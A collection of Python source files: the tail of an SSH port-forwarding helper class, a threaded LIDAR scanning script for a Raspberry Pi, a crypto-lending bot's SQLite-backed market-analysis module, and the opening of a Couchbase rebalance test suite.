@param remoteHost: remote host to forward to
@param remotePort: remote port to forward to
@param serverHost: host on the server to bind to
@param inThread: should we run the forward in a separate thread
@return: Port number used on the server
@rtype: int
"""
transport = self._connection.get_transport()
serverPort = transport.request_port_forward(serverHost, serverPort, handler=self.remote_forward_handler.accept)
self.remote_forward_handler.forwards[(serverHost, serverPort)] = (remoteHost, remotePort)
if not inThread:
while transport.is_alive():
transport.join(60)
else:
return serverPort
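# Illustrative usage only (assumed names): ask the SSH server to listen on
# port 9000 and relay those connections back to 127.0.0.1:8080 on this side;
# `port_forward` stands in for a RemoteSystemPortForward instance.
#
#     assigned_port = port_forward.forwardRemotePort(9000, '127.0.0.1', 8080, inThread=True)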
def forwardLocalPort(self, localPort, remoteHost, remotePort, inThread=False):
"""
Set up a forward tunnel across an SSH server
@param localPort: local port to forward
@param remoteHost: remote host to forward to
@param remotePort: remote port to forward to
@param inThread: should we run the forward in a separate thread
"""
transport = self._connection.get_transport()
# this is a little convoluted, but lets me configure things for the Handler
# object. (SocketServer doesn't give Handlers any way to access the outer
# server normally.)
class SubHandler (LocalPortForwardHandler):
chain_host = remoteHost
chain_port = remotePort
ssh_transport = transport
if inThread:
# Start a thread with the server -- that thread will then start one
# more thread for each request
# @todo: Find a way to stop the forward without having to stop the process
server_thread = threading.Thread(target=LocalForwardServer(('', localPort), SubHandler).serve_forever)
# Exit the server thread when the main thread terminates
server_thread.setDaemon(True)
server_thread.start()
else:
LocalForwardServer(('', localPort), SubHandler).serve_forever()
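# Illustrative usage only (assumed names): listen on local port 8443 and relay
# connections through the SSH transport to remote-host:443.
#
#     port_forward.forwardLocalPort(8443, 'remote-host', 443, inThread=True)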
def cancelForwardRemotePort(self, serverPort):
"""
Stops any connections from being forwarded using the ssh server on the remote server port
@param serverPort: the remote port on the server that needs to be canceled
"""
# transport = self._connection.get_transport()
# transport.cancel_port_forward('', serverPort)
pid, output = self.process.getPidForPort(serverPort)
j.logger.log('PID IS %s and output is %s' % (pid, output))
if pid != -1:
exitCode, output = self.process.killProcess(pid)
if exitCode:
raise RuntimeError('Failed to cancel remote port forwarding for remote port %s. Reason: %s' % (serverPort, output))
return True
raise RuntimeError('Failed to cancel remote port forwarding for remote port %s. Reason: %s' % (serverPort, output))
class LocalForwardServer(SocketServer.ThreadingTCPServer):
daemon_threads = True
allow_reuse_address = True
class LocalPortForwardHandler(SocketServer.BaseRequestHandler):
def handle(self):
try:
requestPeername = self.request.getpeername()
chan = self.ssh_transport.open_channel('direct-tcpip',
(self.chain_host, self.chain_port),
requestPeername)
except Exception as e:
j.logger.log('Incoming request to %s:%d failed: %s' % (self.chain_host,
self.chain_port,
repr(e)), 5)
return
if chan is None:
j.logger.log('Incoming request to %s:%d was rejected by the SSH server.' %
(self.chain_host, self.chain_port), 5)
return
j.logger.log('Connected! Tunnel open %r -> %r -> %r' % (requestPeername,
chan.getpeername(), (self.chain_host, self.chain_port)), 5)
while True:
r, w, x = select.select([self.request, chan], [], [])
if self.request in r:
data = self.request.recv(1024)
if len(data) == 0:
break
chan.send(data)
if chan in r:
data = chan.recv(1024)
if len(data) == 0:
break
self.request.send(data)
chan.close()
self.request.close()
j.logger.log('Tunnel closed from %r' % (requestPeername,), 5)
|
raspi_threads.py
|
__author__="Jaimiey Sears, updated by Alex Schendel and Alex Reinemann, 2018"
__copyright__="October 26, 2015"
__version__= 0.50
import queue
import threading
import socket
#from mpl_toolkits.mplot3d import Axes3D
#from matplotlib import cm
import matplotlib.pyplot as plt
import numpy as np
from LidarCommands.utility import *
from LidarCommands.constants import *
import pickle
import time
#from time import sleep
##############################
# PROGRAM MAIN ENTRY POINT #
##############################
def scan(pub, scanDir, scanID):
pub.publish(scan=scanDir, serialID=scanID)
print("Published command to scan forward")
lt = LidarThreads(debug=False)
# __init__ always returns an instance; a failed connection is signalled by socket being None
if lt.socket is None:
return (None, None)
# make the first thread for reading LIDAR data
debugPrint("Starting", ROSTA)
th1_stop = threading.Event()
th1 = threading.Thread(target=lt.produce, args=(lt.dataQueue, th1_stop, pub, scanDir, scanID,), name="data_reader")
debugPrint("Done making thread 1", ROSTA)
# make the second thread to process the LIDAR data
th2_stop = threading.Event()
th2 = threading.Thread(target=lt.consume, args=(lt.dataQueue, th2_stop,), name="cartesian_converter")
debugPrint("done making thread 2", ROSTA)
# start both threads
th1.start()
th2.start()
# close the threads down
while th1.is_alive():
# th1_stop.set()
th1.join(1.0)
debugPrint("producer stopped", ROSTA)
while th2.is_alive():
th2_stop.set()
th2.join(1.0)
debugPrint("consumer stopped", ROSTA)
th1_stop.set()
th2_stop.set()
x = np.asarray(lt.processedDataArrays[0])
y = np.asarray(lt.processedDataArrays[1])
z = np.asarray(lt.processedDataArrays[2])
distance = np.asarray(lt.processedDataArrays[5])
#plt.pcolormesh([z, lt.processedDataArrays[5]]) # Figure out how this works! Also, why z and dist
#plt.colorbar() # need a colorbar to show the intensity scale
#plt.show()
return lt.scanID, z, distance
debugPrint("Done running threads", ROSTA)
debugPrint("exiting with code {}".format(lt.exit()), ROSTA)
debugPrint("queue size at exit: {}".format(lt.dataQueue.qsize()), ROSTA)
raise SystemExit
#####################
## UNIT TEST 1 END ##
#####################
##
# LidarThreads
# class controls threads for gathering LIDAR data
# **Version 0.10 the actual functions are simulated with time.sleep statements**
##
class LidarThreads():
def __init__(self, debug=False):
# don't forget: netsh interface ip set address "Local Area Connection" static 192.168.0.100
global nhokreadings
self.scanID = 0
# controls a number of debug statements which should only print sometimes
self.debug = debug
self.commandOutput = ""
self.dataOutput = ""
self.slitAngle = START_ANGLE
#command to get data from the lidar.
#MD=Distance measurement with continuous scanning
#Parameters:
#Position at the starting step, length 4, name:Start.
#Position at the ending step, length 4, name:End.Units unknown
#Number of group steps, length 2, name:Grouping Units unknown
#Number of scans to skip, length 1, name:Skips
#Number of measurement scans, length 2, name:Scans
#Documentation: https://en.manu-systems.com/HOK-UTM-30LX-EW_communication_protocol.pdf
strStartCommand = 'MD'+'0300'+'0700'+'00'+'0'+'00'+'\n'
strEndCommand = 'QT'+'\n'
self.StartCommand=bytes(strStartCommand, 'ascii')#convert to ascii encoded binary
self.EndCommand=bytes(strEndCommand, 'ascii')
# establish communication with the sensor.
# NOTE, special network settings are required to connect:
# IP: 192.168.1.11, Subnet Mask: 255.255.255.0 (default) Default Gateway: 192.168.0.1
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.socket.settimeout(.1)
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket.connect(("192.168.0.10", 10940))
except OSError as e:  # socket.timeout is a subclass of OSError
debugPrint("I can't connect. Exiting.", SOCKET_MSG)
self.socket = None
return
# dataQueue is a Queue of strings
# each string representing a slice (scan)
self.dataQueue = queue.Queue()
self.processedDataArrays = []
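# Illustrative sketch (not part of the original class): composing an 'MD'
# request from its documented fields. The field widths follow the comments
# above (start=4, end=4, grouping=2, skips=1, scans=2) and are an assumption
# about the protocol rather than verified behaviour.
#
#     def build_md_command(start, end, grouping=0, skips=0, scans=0):
#         return 'MD{:04d}{:04d}{:02d}{:d}{:02d}\n'.format(start, end, grouping, skips, scans)
#
#     build_md_command(300, 700)  # -> 'MD0300070000000\n', matching StartCommand above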
##
# produce
#
# Description: gets data from the LIDAR unit, puts it into the queue
#
# Parameters:
# dataQueue - queue to submit data to
# stop_event - event to listen to for exit
##
def produce(self, dataQueue, stop_event, pub, scanDir, scanID):
counter = 0
angle = -1
start = time.time()
sID=scanID
for i in range (0,15):#number of slices to scan along y-axis (moving servo motor)
# wait for the Queue to empty
while dataQueue.qsize() > 0:
pass
angle = angle+1
# get the starting theta angle
self.slitAngle = START_ANGLE
# get data from the user
# print "\n>>> Rotate LiDAR to {} degrees".format(ang)
# inp = raw_input(">>> Press enter when ready to make a scan\n")
# if inp == "":
# send scan request to the LIDAR
self.socket.sendall(self.StartCommand)
sID=sID+1
#astr ='MD'+'0180'+'0900'+'00'+'0'+'01'+'\n'
#self.socket.sendall(astr.encode())
#sleep(0.1)
debugPrint("Scanning angle...\n", SOCKET_DATA)
# receive data from the LIDAR
for j in range(0, 100):#number of slices to scan along x-axis (resolution)?
try:
temp = self.socket.recv(3)#receive up to 24 bits of data
#debugPrint("Recv:\n" + temp.decode()[:8], SOCKET_DATA)
data = temp.decode().split("\n")#decode the data and split it by new line
data.reverse()
except socket.timeout as e:
debugPrint("waiting for data", SOCKET_MSG)
break
while data:
try:
line = data.pop()
# put data into our queue for the consumer to use
dataQueue.put((line, angle))
except queue.Full as e:
debugPrint("Data Queue is full.", SOCKET_MSG)
continue
counter += 1.0
end = time.time()
#dataQueue.put('end', angle)
debugPrint("Time difference: {}".format(end-start), ROSTA)
self.socket.sendall(self.EndCommand)
self.scanID = sID
##
# consume
#
# Description: consumes data from the queue
#
# Parameters:
# dataQueue - queue to consume from
# stop_event - the event to watch for quitting.
##
def consume(self, dataQueue, stop_event):
counter = 0
xLines = []
yLines = []
zLines = []
phiLines = []
thetaLines = []
distLines = []
timeLines = []
xLines.append([])
yLines.append([])
zLines.append([])
phiLines.append([])
thetaLines.append([])
distLines.append([])
dataSet = ""
currTime = None
emptied = False
i = 0
index = 0
start = time.time()
while not stop_event.is_set():
try:
# get some data from the queue, process it to cartesian
dataline, anglePhi = dataQueue.get(timeout=0.25)
emptied = False
if dataline == 'end':
xLines.append([])
yLines.append([])
zLines.append([])
phiLines.append([])
thetaLines.append([])
distLines.append([])
i += 1
continue
elif dataline == "":
if not dataSet == "":
for string in splitNparts(dataSet,64):
X, Y, Z, dist, phi, th = decode_new(string, anglePhi)
#self.slitAngle = lastAngle
xLines[i].append(X)
yLines[i].append(Y)
zLines[i].append(Z)
phiLines[i].append(phi)
thetaLines[i].append(th)
distLines[i].append(dist)
# timeLines = timeLines + currTime
#debugPrint(str(distLines), SOCKET_DATA)
dataSet = ""
continue
elif dataline == self.StartCommand.decode().strip():  # StartCommand is bytes; compare against the decoded echo
counter = 0
else:
counter += 1
#debugPrint("Consumer: data= {}".format(dataline), SOCKET_DATA)
self.commandOutput += dataline + '\n'
# if counter == 4:
# currTime = [decodeShort(dataline[:-1])]
if counter >= 5:
dataSet = dataSet + dataline
except queue.Empty as e:
if not emptied:
debugPrint( "Data Queue is empty", SOCKET_MSG)
emptied = True
continue
self.processedDataArrays = (xLines, yLines, zLines, phiLines, thetaLines, distLines)
end = time.time()
debugPrint("Time difference: {}".format(end-start), ROSTA)
##
# exit
#
# Description: closes out the socket
# returns: 0 on success, -1 on failure
##
def exit(self):
if self.socket is not None:
self.socket.close()
return 0
else:
return -1
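# Illustrative usage only: scan() expects a publisher object exposing
# publish(scan=..., serialID=...) (e.g. a ROS-style publisher). The `pub`
# object and argument values below are assumptions, not defined here.
#
#     scan_id, z, distance = scan(pub, scanDir='forward', scanID=0)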
|
MarketAnalysis.py
|
import os
import sys
import threading
import time
import traceback
import datetime
import pandas as pd
import sqlite3 as sqlite
from sqlite3 import Error
from poloniexlendingbot.ExchangeApi import ApiError
# Bot libs
import poloniexlendingbot.Configuration as Config
from poloniexlendingbot.Data import truncate
try:
import numpy
use_numpy = True
except ImportError as ex:
print("WARN: Module Numpy not found, using manual percentile method instead. "
"It is recommended to install Numpy. Error: {0}".format(ex))
use_numpy = False
# Improvements
# [ ] Provide something that takes into account dust offers. (The golden cross works well on BTC, not slower markets)
# [ ] RE: above. Weighted rate.
# [ ] Add docstring to everything
# [ ] Unit tests
# NOTES
# * A possible solution for the dust problem is take the top 10 offers and if the offer amount is less than X% of the
# total available, ignore it as dust.
class MarketDataException(Exception):
pass
class MarketAnalysis(object):
def __init__(self, config, api):
self.currencies_to_analyse = config.get_currencies_list('analyseCurrencies', 'MarketAnalysis')
self.update_interval = int(config.get('MarketAnalysis', 'analyseUpdateInterval', 10, 1, 3600))
self.api = api
self.lending_style = int(config.get('MarketAnalysis', 'lendingStyle', 75, 1, 99))
self.recorded_levels = 10
self.poloniexlendingbot_dir = os.path.dirname(os.path.realpath(__file__))
self.top_dir = os.path.dirname(self.poloniexlendingbot_dir)
self.db_dir = os.path.join(self.top_dir, 'market_data')
self.recorded_levels = int(config.get('MarketAnalysis', 'recorded_levels', 3, 1, 100))
self.data_tolerance = float(config.get('MarketAnalysis', 'data_tolerance', 15, 10, 90))
self.ma_debug_log = config.getboolean('MarketAnalysis', 'ma_debug_log')
self.MACD_long_win_seconds = int(config.get('MarketAnalysis', 'MACD_long_win_seconds',
60 * 30 * 1 * 1,
60 * 1 * 1 * 1,
60 * 60 * 24 * 7))
self.percentile_seconds = int(config.get('MarketAnalysis', 'percentile_seconds',
60 * 60 * 24 * 1,
60 * 60 * 1 * 1,
60 * 60 * 24 * 14))
if self.MACD_long_win_seconds > self.percentile_seconds:
keep_sec = self.MACD_long_win_seconds
else:
keep_sec = self.percentile_seconds
self.keep_history_seconds = int(config.get('MarketAnalysis', 'keep_history_seconds',
int(keep_sec * 1.1),
int(keep_sec * 1.1),
60 * 60 * 24 * 14))
self.MACD_short_win_seconds = int(config.get('MarketAnalysis', 'MACD_short_win_seconds',
int(self.MACD_long_win_seconds / 12),
1,
self.MACD_long_win_seconds / 2))
self.daily_min_multiplier = float(config.get('Daily_min', 'multiplier', 1.05, 1))
self.delete_thread_sleep = float(config.get('MarketAnalysis', 'delete_thread_sleep',
self.keep_history_seconds / 2,
60,
60 * 60 * 2))
self.exchange = config.get_exchange()
if len(self.currencies_to_analyse) != 0:
for currency in self.currencies_to_analyse:
try:
self.api.return_loan_orders(currency, 5)
except Exception as cur_ex:
raise Exception("ERROR: You entered an incorrect currency: '{0}' to analyse the market of, please "
"check your settings. Error message: {1}".format(currency, cur_ex))
def run(self):
"""
Main entry point to start recording data. This starts all the other threads.
"""
for cur in self.currencies_to_analyse:
db_con = self.create_connection(cur)
self.create_rate_table(db_con, self.recorded_levels)
db_con.close()
self.run_threads()
self.run_del_threads()
def run_threads(self):
"""
Start threads for each currency we want to record. (should be configurable later)
"""
for _ in ['thread1']:
for cur in self.currencies_to_analyse:
thread = threading.Thread(target=self.update_market_thread, args=(cur,))
thread.daemon = True
thread.start()
def run_del_threads(self):
"""
Start thread to start the DB cleaning threads.
"""
for _ in ['thread1']:
for cur in self.currencies_to_analyse:
del_thread = threading.Thread(target=self.delete_old_data_thread, args=(cur, self.keep_history_seconds))
del_thread.daemon = False
del_thread.start()
def delete_old_data_thread(self, cur, seconds):
"""
Thread to clean the DB.
"""
while True:
try:
db_con = self.create_connection(cur)
self.delete_old_data(db_con, seconds)
except Exception as ex:
print("Error in MarketAnalysis: {0}".format(ex))
traceback.print_exc()
time.sleep(self.delete_thread_sleep)
@staticmethod
def print_traceback(ex, log_message):
print("{0}: {1}".format(log_message, ex))
traceback.print_exc()
@staticmethod
def print_exception_error(ex, log_message, debug=False):
print("{0}: {1}".format(log_message, ex))
if debug:
import traceback
ex_type, value, tb = sys.exc_info()
print("DEBUG: Class:{0} Args:{1}".format(ex.__class__, ex.args))
print("DEBUG: Type:{0} Value:{1} LineNo:{2}".format(ex_type, value, tb.tb_lineno))
traceback.print_exc()
def update_market_thread(self, cur, levels=None):
"""
This is where the main work is done for recording the market data. The loop will not exit and continuously
polls exchange for the current loans in the book.
:param cur: The currency (database) to record data for
:param levels: The depth of offered rates to store
"""
if levels is None:
levels = self.recorded_levels
db_con = self.create_connection(cur)
while True:
try:
raw_data = self.api.return_loan_orders(cur, levels)['offers']
except ApiError as ex:
if '429' in str(ex):
if self.ma_debug_log:
print("Caught ERR_RATE_LIMIT, sleeping capture and increasing request delay. Current"
" {0}ms".format(self.api.req_period))
time.sleep(130)
# No data was fetched this iteration, so skip the insert and poll again.
continue
except Exception as ex:
if self.ma_debug_log:
self.print_traceback(ex, "Error in returning data from exchange")
else:
print("Error in returning data from exchange, ignoring")
continue
market_data = []
for i in range(levels):
try:
market_data.append(str(raw_data[i]['rate']))
market_data.append(str(raw_data[i]['amount']))
except IndexError:
market_data.append("5")
market_data.append("0.1")
market_data.append('0') # Percentile field not being filled yet.
self.insert_into_db(db_con, market_data)
def insert_into_db(self, db_con, market_data, levels=None):
if levels is None:
levels = self.recorded_levels
insert_sql = "INSERT INTO loans ("
for level in range(levels):
insert_sql += "rate{0}, amnt{0}, ".format(level)
insert_sql += "percentile) VALUES ({0});".format(','.join(market_data)) # percentile = 0
with db_con:
try:
db_con.execute(insert_sql)
except Exception as ex:
self.print_traceback(ex, "Error inserting market data into DB")
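# Illustrative note: for levels=2 the statement built above expands to
#   INSERT INTO loans (rate0, amnt0, rate1, amnt1, percentile) VALUES (<rate0>,<amnt0>,<rate1>,<amnt1>,0);
# where the VALUES list is the comma-joined market_data and the trailing '0'
# is the placeholder percentile appended by update_market_thread.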
def delete_old_data(self, db_con, seconds):
"""
Delete old data from the database
:param db_con: Connection to the database
:param seconds: The time in seconds of the oldest data to be kept
"""
del_time = int(time.time()) - seconds
with db_con:
query = "DELETE FROM loans WHERE unixtime < {0};".format(del_time)
cursor = db_con.cursor()
cursor.execute(query)
@staticmethod
def get_day_difference(date_time): # Will be a number of seconds since epoch
"""
Get the difference in days between the supplied date_time and now.
:param date_time: A python date time object
:return: The number of days that have elapsed since date_time
"""
date1 = datetime.datetime.fromtimestamp(float(date_time))
now = datetime.datetime.now()
diff_days = (now - date1).days
return diff_days
def get_rate_list(self, cur, seconds):
"""
Query the database (cur) for rates recorded between the supplied number of seconds ago and now.
:param cur: The currency (database) to query, or an open sqlite3 connection
:param seconds: The number of seconds between the oldest order returned and now.
:return: A pandas DataFrame object with named columns ('time', 'rate0', 'rate1',...)
"""
# Request more data from the DB than we need to allow for skipped seconds
request_seconds = int(seconds * 1.1)
full_list = Config.get_all_currencies()
if isinstance(cur, sqlite.Connection):
db_con = cur
else:
if cur not in full_list:
raise ValueError("{0} is not a valid currency, must be one of {1}".format(cur, full_list))
if cur not in self.currencies_to_analyse:
return []
db_con = self.create_connection(cur)
price_levels = ['rate0']
rates = self.get_rates_from_db(db_con, from_date=time.time() - request_seconds, price_levels=price_levels)
if len(rates) == 0:
return []
df = pd.DataFrame(rates)
columns = ['time']
columns.extend(price_levels)
try:
df.columns = columns
except:
if self.ma_debug_log:
print("DEBUG:get_rate_list: cols: {0} rates:{1} db:{2}".format(columns, rates, db_con))
raise
# convert unixtimes to datetimes so we can resample
df.time = pd.to_datetime(df.time, unit='s')
# If we don't have enough data return df, otherwise the resample will fill out all values with the same data.
# Missing data tolerance allows for a percentage to be ignored and filled in by resampling.
if len(df) < seconds * (self.data_tolerance / 100):
return df
# Resample into 1 second intervals, average if we get two in the same second and fill any empty spaces with the
# previous value
df = df.resample('1s', on='time').mean().ffill()
return df
def get_analysis_seconds(self, method):
"""
Gets the correct number of seconds to use for analysing data depending on the method being used.
"""
if method == 'percentile':
return self.percentile_seconds
elif method == 'MACD':
return self.MACD_long_win_seconds
def get_rate_suggestion(self, cur, rates=None, method='percentile'):
"""
Return the suggested rate from analysed data. This is the main method for retrieving data from this module.
Currently this only supports returning of a single value, the suggested rate. However this will be expanded to
suggest a lower and higher rate for spreads.
:param cur: The currency (database) to get the rate suggestion for
:param rates: This is used for unit testing only. It allows you to populate the data used for the suggestion.
:param method: The method by which you want to calculate the suggestion.
:return: A float with the suggested rate for the currency.
"""
error_msg = "WARN: Exception found when analysing markets, if this happens for more than a couple minutes " +\
"please create a Github issue so we can fix it. Otherwise, you can ignore it. Error"
try:
rates = self.get_rate_list(cur, self.get_analysis_seconds(method)) if rates is None else rates
if not isinstance(rates, pd.DataFrame):
raise ValueError("Rates must be a Pandas DataFrame")
if len(rates) == 0:
print("Rate list not populated")
if self.ma_debug_log:
print("DEBUG:get_analysis_seconds: cur: {0} method:{1} rates:{2}".format(cur, method, rates))
return 0
if method == 'percentile':
return self.get_percentile(rates.rate0.values.tolist(), self.lending_style)
if method == 'MACD':
macd_rate = truncate(self.get_MACD_rate(cur, rates), 6)
if self.ma_debug_log:
print("Cur:{0}, MACD:{1:.6f}, Perc:{2:.6f}, Best:{3:.6f}"
.format(cur, macd_rate, self.get_percentile(rates.rate0.values.tolist(), self.lending_style),
rates.rate0.iloc[-1]))
return macd_rate
except MarketDataException:
if method != 'percentile':
print("Caught exception during {0} analysis, using percentile for now".format(method))
return self.get_percentile(rates.rate0.values.tolist(), self.lending_style)
else:
raise
except Exception as ex:
self.print_exception_error(ex, error_msg, debug=self.ma_debug_log)
return 0
@staticmethod
def percentile(N, percent, key=lambda x: x):
"""
http://stackoverflow.com/questions/2374640/how-do-i-calculate-percentiles-with-python-numpy/2753343#2753343
Find the percentile of a list of values.
:parameter N: A list of values. Note N MUST BE already sorted.
:parameter percent: A float value from 0.0 to 1.0.
:parameter key: Optional key function to compute value from each element of N.
:return: Percentile of the values
"""
import math
if not N:
return None
k = (len(N) - 1) * percent
f = math.floor(k)
c = math.ceil(k)
if f == c:
return key(N[int(k)])
d0 = key(N[int(f)]) * (c - k)
d1 = key(N[int(c)]) * (k - f)
return d0 + d1
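# Worked example: percentile([1, 2, 3, 4], 0.5) gives k = 1.5, f = 1, c = 2,
# d0 = 2 * 0.5 = 1.0, d1 = 3 * 0.5 = 1.5, so the result is 2.5 (linear
# interpolation between the two middle values).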
def get_percentile(self, rates, lending_style, use_numpy=use_numpy):
"""
Take a list of rates no matter what method is being used, simple list, no pandas / numpy array
"""
if use_numpy:
result = numpy.percentile(rates, int(lending_style))
else:
result = self.percentile(sorted(rates), lending_style / 100.0)
result = truncate(result, 6)
return result
def get_MACD_rate(self, cur, rates_df):
"""
Golden cross is a bit of a misnomer. But we're trying to look at the short term moving average and the long
term moving average. If the short term is above the long term then the market is moving in a bullish manner and
it's a good time to lend. So return the short term moving average (scaled with the multiplier).
:param cur: The currency being analysed (used for logging)
:param rates_df: A pandas DataFrame with times and rates
:return: A float of the suggested, calculated rate
"""
if len(rates_df) < self.get_analysis_seconds('MACD') * (self.data_tolerance / 100):
print("{0} : Need more data for analysis, still collecting. I have {1}/{2} records"
.format(cur, len(rates_df), int(self.get_analysis_seconds('MACD') * (self.data_tolerance / 100))))
raise MarketDataException
short_rate = rates_df.rate0.tail(self.MACD_short_win_seconds).mean()
long_rate = rates_df.rate0.tail(self.MACD_long_win_seconds).mean()
if self.ma_debug_log:
sys.stdout.write("Short higher: ") if short_rate > long_rate else sys.stdout.write("Long higher: ")
if short_rate > long_rate:
if rates_df.rate0.iloc[-1] < short_rate:
return short_rate * self.daily_min_multiplier
else:
return rates_df.rate0.iloc[-1] * self.daily_min_multiplier
else:
return long_rate * self.daily_min_multiplier
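# Illustrative numbers (assumed, not from real market data): with
# short_rate = 0.012, long_rate = 0.010 and a last observed rate0 of 0.011,
# the short average is higher (bullish) and the last rate sits below it, so
# the suggestion is 0.012 * daily_min_multiplier.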
def create_connection(self, cur, db_path=None, db_type='sqlite3'):
"""
Create a connection to the sqlite DB. This will create a new file if one doesn't exist. We can use :memory:
here for db_path if we don't want to store the data on disk
:param cur: The currency (database) in the DB
:param db_path: DB directory
:return: Connection object or None
"""
if db_path is None:
prefix = Config.get_exchange()
db_path = os.path.join(self.db_dir, '{0}-{1}.db'.format(prefix, cur))
try:
con = sqlite.connect(db_path)
return con
except Error as ex:
print(ex)
def create_rate_table(self, db_con, levels):
"""
Create a new table to hold rate data.
:param db_con: Connection to the database (there is a separate database file per currency)
:param levels: The depth of offered rates to store
"""
with db_con:
cursor = db_con.cursor()
create_table_sql = "CREATE TABLE IF NOT EXISTS loans (id INTEGER PRIMARY KEY AUTOINCREMENT," + \
"unixtime integer(4) not null default (strftime('%s','now')),"
for level in range(levels):
create_table_sql += "rate{0} FLOAT, ".format(level)
create_table_sql += "amnt{0} FLOAT, ".format(level)
create_table_sql += "percentile FLOAT);"
cursor.execute("PRAGMA journal_mode=wal")
cursor.execute(create_table_sql)
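# Illustrative note: for levels=1 the generated schema is
#   CREATE TABLE IF NOT EXISTS loans (id INTEGER PRIMARY KEY AUTOINCREMENT,
#     unixtime integer(4) not null default (strftime('%s','now')),
#     rate0 FLOAT, amnt0 FLOAT, percentile FLOAT);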
def get_rates_from_db(self, db_con, from_date=None, price_levels=['rate0']):
"""
Query the DB for all rates for a particular currency
:param db_con: Connection to the database for the currency you want rates for
:param from_date: The earliest data you want, specified in unix time (seconds since epoch)
:param price_levels: We record multiple price levels in the DB, the best offer being rate0
"""
with db_con:
cursor = db_con.cursor()
query = "SELECT unixtime, {0} FROM loans ".format(",".join(price_levels))
if from_date is not None:
query += "WHERE unixtime > {0}".format(from_date)
query += ";"
cursor.execute(query)
return cursor.fetchall()
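# Illustrative usage only: typical wiring of MarketAnalysis. The `config` and
# `api` objects are assumptions standing in for the bot's Configuration and
# exchange API wrappers, not defined in this file.
#
#     analysis = MarketAnalysis(config, api)
#     analysis.run()                                        # start recording threads
#     rate = analysis.get_rate_suggestion('BTC', method='percentile')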
|
rebalancetests.py
|
import time
import unittest
from TestInput import TestInputSingleton
import logger
from membase.api.rest_client import RestConnection, RestHelper
from membase.helper.bucket_helper import BucketOperationHelper
from membase.helper.cluster_helper import ClusterOperationHelper
from membase.helper.rebalance_helper import RebalanceHelper
from memcached.helper.data_helper import MemcachedClientHelper, VBucketAwareMemcached, LoadWithMcsoda
from threading import Thread
from old_tasks import task, taskmanager
from memcached.helper.data_helper import DocumentGenerator
from memcached.helper.old_kvstore import ClientKeyValueStore
class RebalanceBaseTest(unittest.TestCase):
@staticmethod
def common_setup(self):
self.log = logger.Logger.get_logger()
self.input = TestInputSingleton.input
self.servers = self.input.servers
master = self.servers[0]
rest = RestConnection(master)
# Cleanup previous state
self.task_manager = None
rest.stop_rebalance()
RebalanceBaseTest.reset(self)
# Initialize test params
self.replica = self.input.param("replica", 1)
# By default we use keys-count for LoadTask
# Use keys-count=-1 to use load-ratio
self.keys_count = self.input.param("keys-count", 30000)
self.load_ratio = self.input.param("load-ratio", 6)
self.expiry_ratio = self.input.param("expiry-ratio", 0.1)
self.delete_ratio = self.input.param("delete-ratio", 0.1)
self.access_ratio = self.input.param("access-ratio", 1 - self.expiry_ratio - self.delete_ratio)
self.num_buckets = self.input.param("num-buckets", 1)
self.num_rebalance = self.input.param("num-rebalance", 1)
self.do_ascii = self.input.param("ascii", False)
self.do_verify = self.input.param("do-verify", True)
self.repeat = self.input.param("repeat", 1)
self.max_ops_per_second = self.input.param("max_ops_per_second", 500)
self.min_item_size = self.input.param("min_item_size", 128)
self.do_stop = self.input.param("do-stop", False)
self.skip_cleanup = self.input.param("skip-cleanup", False)
self.checkResidentRatio = self.input.param("checkResidentRatio", False)
self.activeRatio = self.input.param("activeRatio", 50)
self.replicaRatio = self.input.param("replicaRatio", 50)
self.case_number = self.input.param("case_number", 0)
self.log.info('picking server : {0} as the master'.format(master))
node_ram_ratio = BucketOperationHelper.base_bucket_ratio(self.servers)
info = rest.get_nodes_self()
rest.init_cluster(username=master.rest_username,
password=master.rest_password)
rest.init_cluster_memoryQuota(memoryQuota=int(info.mcdMemoryReserved * node_ram_ratio))
BucketOperationHelper.create_multiple_buckets(master, self.replica, node_ram_ratio * (2.0 / 3.0),
howmany=self.num_buckets, sasl=not self.do_ascii)
buckets = rest.get_buckets()
for bucket in buckets:
ready = BucketOperationHelper.wait_for_memcached(master, bucket.name)
self.assertTrue(ready, "wait_for_memcached failed")
# Initialize and start the taskManager
self.task_manager = taskmanager.TaskManager()
self.task_manager.start()
@staticmethod
def common_tearDown(self):
self.log.info("============== basetestcase cleanup was started for test #{0} {1} =============="\
.format(self.case_number, self._testMethodName))
if self.task_manager is not None:
self.task_manager.cancel()
self.task_manager.join()
if not self.skip_cleanup:
RebalanceBaseTest.reset(self)
self.log.info("============== basetestcase cleanup was finished for test #{0} {1} =============="\
.format(self.case_number, self._testMethodName))
@staticmethod
def reset(self):
rest = RestConnection(self.servers[0])
if rest._rebalance_progress_status() == 'running':
self.log.warning("rebalancing is still running, test should be verified")
stopped = rest.stop_rebalance()
self.assertTrue(stopped, msg="unable to stop rebalance")
BucketOperationHelper.delete_all_buckets_or_assert(self.servers, self)
for server in self.servers:
ClusterOperationHelper.cleanup_cluster([server])
self.log.info("Stopping load in Teardown")
ClusterOperationHelper.wait_for_ns_servers_or_assert(self.servers, self)
@staticmethod
def replication_verification(master, bucket_data, replica, test, failed_over=False):
asserts = []
rest = RestConnection(master)
buckets = rest.get_buckets()
nodes = rest.node_statuses()
test.log.info("expect {0} / {1} replication ? {2}".format(len(nodes),
(1.0 + replica), len(nodes) / (1.0 + replica)))
for bucket in buckets:
ClusterOperationHelper.flushctl_set(master, "exp_pager_stime", 30, bucket.name)
if len(nodes) / (1.0 + replica) >= 1:
test.assertTrue(RebalanceHelper.wait_for_replication(rest.get_nodes(), timeout=300),
msg="replication did not complete after 5 minutes")
#run expiry_pager on all nodes before doing the replication verification
for bucket in buckets:
ClusterOperationHelper.flushctl_set(master, "exp_pager_stime", 30, bucket.name)
test.log.info("wait for expiry pager to run on all these nodes")
time.sleep(30)
ClusterOperationHelper.flushctl_set(master, "exp_pager_stime", 3600, bucket.name)
ClusterOperationHelper.flushctl_set(master, "exp_pager_stime", 30, bucket.name)
# windows need more than 15 minutes to get number matched
replica_match = RebalanceHelper.wait_till_total_numbers_match(bucket=bucket.name,
master=master,
timeout_in_seconds=600)
if not replica_match:
asserts.append("replication was completed but sum(curr_items) don't match the curr_items_total %s" %
bucket.name)
if not failed_over:
stats = rest.get_bucket_stats(bucket=bucket.name)
# RebalanceHelper.print_taps_from_all_nodes(rest, bucket.name)
msg = "curr_items : {0} is not equal to actual # of keys inserted : {1} : bucket: {2}"
if bucket_data[bucket.name]['kv_store'] is None:
items_inserted = bucket_data[bucket.name]["items_inserted_count"]
else:
items_inserted = len(bucket_data[bucket.name]['kv_store'].valid_items())
